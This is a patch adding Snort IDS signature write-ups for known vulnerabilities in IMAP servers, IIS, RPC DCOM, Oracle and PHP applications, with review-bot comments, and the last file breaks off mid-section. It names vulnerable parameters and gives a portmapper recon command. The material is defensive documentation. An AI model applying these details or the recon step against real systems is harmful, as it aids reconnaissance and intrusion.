+
+In the case of Ipswitch IMail, an overly long mailbox name supplied as a
+parameter to the examine command may be a trigger condition of a buffer
+overflow. A name of 259 bytes or more may cause this to occur.
+
+--
+Affected Systems:
+	Pegasus Mail Mercury Mail Transport System 3.32
+	Pegasus Mail Mercury Mail Transport System 4.01a
+	Ipswitch IMail 8.1.3
+
+--
+Attack Scenarios:
+An attacker can supplied an overly long command, causing denial of
+service or a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell<bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
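Review bot: Grammar in Attack Scenarios: "An attacker can supplied an overly long command" should be "An attacker can supply an overly long command". In Summary, "associated with the several commands of an IMAP service" should be "associated with several commands of an IMAP service". Detailed Information gives a concrete trigger threshold (a mailbox name of 259 bytes or more for Ipswitch IMail), which is useful for tuning, so the empty Additional References section should cite the vendor advisories for the Mercury and IMail versions listed under Affected Systems. Minor: missing space in "Brian Caswell<bmc@sourcefire.com>" under Contributors.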
--- /dev/null
+++ b/doc/signatures/1671.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1671
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
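Review bot: This is the 1117.txt text repeated verbatim for SID 1671, including the empty Additional References section and the missing apostrophe in "attackers choosing"; the file should say what request pattern SID 1671 actually detects rather than that "attack scenarios are legion", and cite a reference for it.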
--- /dev/null
+++ b/doc/signatures/100000433.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000433
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "BlueShoes" application running on a webserver. Access to the file "viewer.php" using a remote file being passed as the "APP[path][core]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "APP[path][core]" parameter in the "viewer.php" script used by the "BlueShoes" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using BlueShoes
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
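Review bot: Paragraph order in Detailed Information is backwards: the specific RFI description ("include a file from a remote machine via the "APP[path][core]" parameter in the "viewer.php" script") is followed by two generic CGI paragraphs, the last of which restates the event in generic terms ("This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server") and carries the "ona" typo; drop the generic text or move it ahead of the specific paragraph. In Summary, "may indicate that an exploitation attempt has been attempted" is redundant; "may indicate an exploitation attempt" is enough. Layout: the "--" after "100000433" and after the Affected Systems line lacks the blank line used elsewhere, and the file ends with a stray blank "+" line. Additional References is empty; add the advisory for the BlueShoes issue so the affected version can be checked.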
--- /dev/null
+++ b/doc/signatures/3178.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3178
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
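Review bot: Typo in Ease of Attack: "Expoit code exists" should be "Exploit code exists". Additional References is empty even though the Microsoft RPC DCOM issue described in Detailed Information has a vendor bulletin; citing it lets an analyst confirm patch status on the Windows versions listed under Affected Systems. The Corrective Action guidance to filter TCP and UDP 135, 139 and 445 from external sources is the concrete, checkable part of this file and should stay as written.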
--- /dev/null
+++ b/doc/signatures/818.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+818
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
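Review bot: SID 818 gets the same unspecific CGI boilerplate as 1711.txt, 1395.txt and 1712.txt earlier in this patch (including "running ona web server"), with an empty Additional References section; please add the name of the CGI program the rule matches and a reference so the documentation is actually usable for triage.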
--- /dev/null
+++ b/doc/signatures/3090.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3090
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
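Review bot: A stray blank line between "-- " and "Corrective Action:" breaks the otherwise uniform separator/heading layout of this file. Under Affected Systems, "Microsoft Windows Server 2000" is not a Microsoft product name; it should presumably read "Microsoft Windows 2000 Server". Additional References is empty; the License Logging Service message-length flaw described in Detailed Information has a vendor bulletin that should be cited so "Apply the appropriate vendor supplied patches" points at something concrete. Several separators carry trailing whitespace ("-- ").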
--- /dev/null
+++ b/doc/signatures/2149.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid: 2149
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a weakness in a php application. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in php applications.
+
+The Turba of Horde PHP application allows a user to request the status.php file which may disclose valuable information about the host and the application.
+
+The attacker may be trying to gain information on the php implementation on the host, this may be the prelude to an attack against that host using that information.
+
+--
+Affected Systems:
+Any host using Turba of Horde php application.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the php application on the host. The attacker might then gain administrator access to the site or database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the php implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
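Review bot: "Sid: 2149" is written on one line here while every other file in this patch puts the number on the line after "Sid:"; keep one layout. Comma splice in Detailed Information: "The attacker may be trying to gain information on the php implementation on the host, this may be the prelude to an attack" should be two sentences. "php" should be "PHP", and "The Turba of Horde PHP application" is unclear; if this is the Turba module of the Horde framework, say so, and repeat the requested path (status.php) in the Summary so the analyst knows what the rule matches. Additional References is empty.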
--- /dev/null
+++ b/doc/signatures/2681.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2681
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure sdo_code_size
+. This procedure is included in
+mdsys.sdo_admin.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
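Review bot: Detailed Information has a rendering artifact: the procedure name and the end of the sentence are split across lines ("vulnerability in the procedure sdo_code_size" / ". This procedure is included in" / "mdsys.sdo_admin."), which looks like a template substitution that kept a newline in the value; join it into one sentence. "Oracle Oracle9i" under Affected Systems duplicates the vendor name. Corrective Action "Apply the appropriate vendor supplied patch" has no terminating period and nothing to point at, since Additional References is empty; add the Oracle alert covering the mdsys.sdo_admin overflows.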
--- /dev/null
+++ b/doc/signatures/100000411.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000411
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "REDAXO" application running on a webserver. Access to the file "index.inc.php" using a remote file being passed as the "REX[INCLUDE_PATH]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "REX[INCLUDE_PATH]" parameter in the "index.inc.php" script used by the "REDAXO" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using REDAXO
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
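Review bot: Same structural issues as 100000433.txt: the specific REDAXO paragraph ("REX[INCLUDE_PATH]" parameter in "index.inc.php") is followed by generic CGI text that restates the event ("This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server"), the Summary's "an exploitation attempt has been attempted" is redundant, the file ends with a stray blank "+" line, and Additional References is empty. Drop or reorder the generic paragraphs and add the advisory reference for the REDAXO issue.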
--- /dev/null
+++ b/doc/signatures/625.txt
@@ -0,0 +1,65 @@
+Rule:
+--
+Sid:
+625
+
+Summary:
+--
+A TCP packet with all of the (unreserved) control bits set was
+detected as being destined for your machine. 
+
+--
+Impact:
+System recon.  Different operating-systems will respond in different
+ways depending on their particular stack implementation.  This allows
+attackers to determine things such as open/closed ports, ACLs, and the
+like.
+
+--
+Detailed Information:
+The ACK, FIN, PSH, RST, SYN, and URG control bits were set in a TCP
+packet.  
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+As part of a recon mission that may be an indicator to upcoming
+attacks, an attacker may attempt to determine what ports are listening
+on a given machine by sending a TCP packet with all of its control
+bits "lit up", hence the name XMAS scan -- its "lit up like a
+christmas tree."
+__
+Ease of Attack:
+Trivial.  Many of the popular portscanners/vulnerability testers, most
+notably nmap, allow anyone to inititiate an XMAS scan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Determine what information an attacker may have gleaned from this
+attack.  Would your ports show as open or closed?  Consider
+implementing a stateful firewall on the victim machine, or at ingress
+points on your network.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Jon Hart <warchild@spoofed.org>
+
+-- 
+Additional References:
+http://rr.sans.org/firewall/egress.php
+
+--
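Review bot: The Summary heading and its separator are swapped: the file reads "Summary:" then "--" then the text, whereas every other section puts "--" before the heading; and the separator before Ease of Attack is "__" (underscores) instead of "--", which any tooling that splits on "--" will miss. Affected Systems is empty; either fill it in or state "All" as 1798.txt does. Typos: "inititiate" (initiate), "unkown" (unknown), and "its "lit up like a christmas tree"" should be "it's". The mid-sentence " -- " in Attack Scenarios is harmless if separator detection is anchored to line start, but a comma avoids the ambiguity. Also worth noting: Summary says "all of the (unreserved) control bits" while Detailed Information lists six (ACK, FIN, PSH, RST, SYN, URG); making the two agree would help analysts compare against a capture.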
--- /dev/null
+++ b/doc/signatures/2584.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+1102
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the peer to peer (p2p) client eMule.
+
+--
+Impact:
+Possible execution of arbitrary code of the attackers choosing.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the p2p application eMule. The eMule client is prone to
+a buffer overflow condition which may present an attacker with the
+opportunity to execute code of their choosing on a vulnerable host.
+
+The issue surrounds the IRC module and the Web server portions of the
+client. Sufficient bounds checking of user supplied data is not
+correctly implemented causing the opportunity to overflow a buffer.
+
+--
+Affected Systems:
+	All systems using eMule.
+
+--
+Attack Scenarios:
+An attacker can supply overly long data in an IRC session between two
+clients to trigger the overflow.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
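Review bot: The Sid in this file is "1102" but the file is doc/signatures/2584.txt and the text describes the eMule IRC/Web server overflow; the SID value looks copied from another document and should be corrected to 2584 (or the file renamed) before this ships, since tooling that maps SIDs to documentation will attach this text to the wrong rule. Additional References is empty; cite the eMule advisory so the "latest non-affected version" mentioned in Corrective Action can be identified.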
--- /dev/null
+++ b/doc/signatures/598.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+598
+
+--
+Summary:
+This event is generated when an attempt is made dump entries from the portmapper.
+
+--
+Impact:
+Information disclosure.  This request can discover what Remote Procedure Call (RPC) services are offered and on which ports they listen. 
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts.  It can be queried for all RPC services running, the RPC program name and version, the protocol (TCP or UDP), and the port where the service listens.  This can provide an attacker with valuable information about what RPC services are offered and on which ports.
+
+--
+Affected Systems:
+All hosts running portmapper.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover RPC services and their associated listening ports. 
+
+--
+Ease of Attack:
+Simple. Execute 'rpcinfo -p hostname/IP'.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines.
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS429
+
+
+--
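Review bot: Missing word in Summary: "an attempt is made dump entries from the portmapper" should be "an attempt is made to dump entries from the portmapper". Otherwise this file is a good model for the others in this patch: it names the exact query ('rpcinfo -p hostname/IP'), explains what is disclosed, and carries an Arachnids reference under Additional References; only the double blank line before the closing "--" needs trimming.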
--- /dev/null
+++ b/doc/signatures/2858.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2858
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_delete_resolution
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
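Review bot: Same line-break artifact as 2681.txt: "vulnerability in the procedure add_delete_resolution" / ". This procedure is included in" / "sys.dbms_repcat_conf." should be a single sentence, and "Oracle Oracle9i" duplicates the vendor name. Additional References is empty; the Oracle alert for the sys.dbms_repcat_conf overflows should be cited, and the Corrective Action line needs a terminating period.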
--- /dev/null
+++ b/doc/signatures/1788.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1788
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
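Review bot: Two typos in this write-up: "running ona web server" in Detailed Information should be "running on a web server", and "the attackers choosing" (Impact and Detailed Information) should be "the attacker's choosing". Beyond that, nothing here says which CGI script or request pattern sid 1788 matches; the Summary "a known vulnerability in a CGI web application" and the empty Additional References give an analyst nothing to triage on, so name the script the rule keys on and add a reference.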
--- /dev/null
+++ b/doc/signatures/1618.txt
@@ -0,0 +1,77 @@
+Rule:
+
+--
+Sid:
+1618
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow associated with chunked encoding processing of Active Server Pages (ASP) in Internet Information Services (IIS). 
+
+--
+Impact:
+Remote Access.  If the exploit is successful, an attacker can gain remote access of the target host. 
+
+--
+Detailed Information:
+A buffer overflow exists with chunked encoding processing associated with ASP in IIS.  Chunked encoding allows different sized chunks of data to be passed from the web client to the server.  A heap overflow vulnerability exists because of an error in chunked encoding data transfer associated with the Internet Services Application Programming Interface (ISAPI) extension that implements ASP.
+
+--
+Affected Systems:
+
+Microsoft IIS 4.0
+  Cisco Building Broadband Service Manager 5.0
+  Cisco Call Manager 1.0, 2.0, 3.0
+  Cisco ICS 7750
+  Cisco IP/VC 3540
+  Cisco Unity Server 2.0, 2.2, 2.3, 2.4
+  Cisco uOne 1.0, 2.0, 3.0, 4.0
+  Microsoft BackOffice 4.0, 4.5
+  Microsoft Windows NT 4.0 Option Pack
+
+Microsoft IIS 5.0
+  Microsoft Windows 2000 Advanced Server, SP1, SP2
+  Microsoft Windows 2000 Datacenter Server SP1, SP2
+  Microsoft Windows 2000 Professional, SP1, SP2
+  Microsoft Windows 2000 Server, SP1, SP2
+
+--
+Attack Scenarios:
+An attacker can craft a chunked encoded request to exploit the heap overflow.
+
+--
+Ease of Attack:
+Easy.  Exploit code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the cumulative patch Q319733.
+
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0079
+
+Bugtraq
+http://www.securityfocus.com/bid/4485
+
+Microsoft
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms02-018.asp
+
+--
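Review bot: The Affected Systems list uses mixed indentation: "Microsoft IIS 4.0" and "Microsoft IIS 5.0" sit flush left while the products under them are indented with two spaces, whereas the other files in this patch (sid 1965, for example) tab-indent every entry. Corrective Action names the fix only by knowledge-base number ("cumulative patch Q319733"); the MS02-018 bulletin is already linked under Additional References, so mention the bulletin in Corrective Action as well so the two sections agree. The double blank line after Corrective Action also differs from the single blank line used everywhere else.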
--- /dev/null
+++ b/doc/signatures/1965.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+1965
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the Remote Procedure Call (RPC) ToolTalk.
+
+--
+Impact:
+Remote root access. This attack may permit the execution of arbitrary
+commands with the privileges of root.
+
+--
+Detailed Information:
+The ttdbserverd RPC service, more commonly known as the ToolTalk
+database server, allows applications to communicate in the Common
+Desktop Environment (CDE).  The ToolTalk service receives ToolTalk
+messages created and sent by applications and delivers them to the
+appropriate recipient applications.  The ToolTalk database server is
+enabled by default on hosts with CDE.  A function in the code receives
+an argument for a pathname.  If an overly long pathname is passed to the
+function, a buffer overflow may occur, possibly allowing the execution
+of arbitrary commands with the privileges of root.
+
+--
+Affected Systems:
+	HP HP-UX 10.10, 10.20, 10.30, 11.0
+	IBM AIX 4.1, 4.1.1, 4.1.2, 4.1.3, 4.1.4, 4.1.5, 4.2, 4.2.1, 4.3
+	SGI IRIX 5.2, 5.3, 6.0, 6.0.1, 6.2, 6.3, 6.4
+	Sun Solaris 1.1, 1.1.1, 1.1.2, 1.1.3, 1.1.4, 1.2, 2.0, 2.1, 2.2, 2.3,
+	2.4, 2.5, 2.5.1, 2.6
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where
+ttdbserverd runs.  Alternately, an attacker may attempt to execute the
+exploit code on any listening port in the RPC range if the portmapper is
+blocked.
+
+--
+Ease of Attack:
+Simple.  Exploit scripts are freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to
+RPC-enabled machines.
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
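Review bot: Additional References is empty although Detailed Information describes a specific ttdbserverd pathname overflow; the comparable overflow write-up for sid 1618 in this patch carries CVE, Bugtraq and vendor links, and this entry should cite its advisory the same way. In Affected Systems the Sun Solaris entry wraps onto a second tab-indented line ("2.4, 2.5, 2.5.1, 2.6"), which reads like a separate, unnamed entry; keep each vendor line whole or repeat the vendor and product on the continuation line.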
--- /dev/null
+++ b/doc/signatures/1412.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+1412
+
+--
+
+Summary:
+This event is generated when an SNMP connection over TCP using the 
+default 'public' community is made.
+
+--
+
+Impact:
+Information gathering
+
+--
+
+Detailed Information:
+SNMP (Simple Network Management Protocol) v1 uses communities and IP 
+addresses to authenticate communication between the SNMP client and SNMP
+daemon. Many SNMP implementations come pre-configured with 'public' and 
+'public' communities. If these are not disabled, the attacker can 
+gather a great deal of information about the device running the SNMP 
+daemon.
+
+--
+
+Affected Systems:
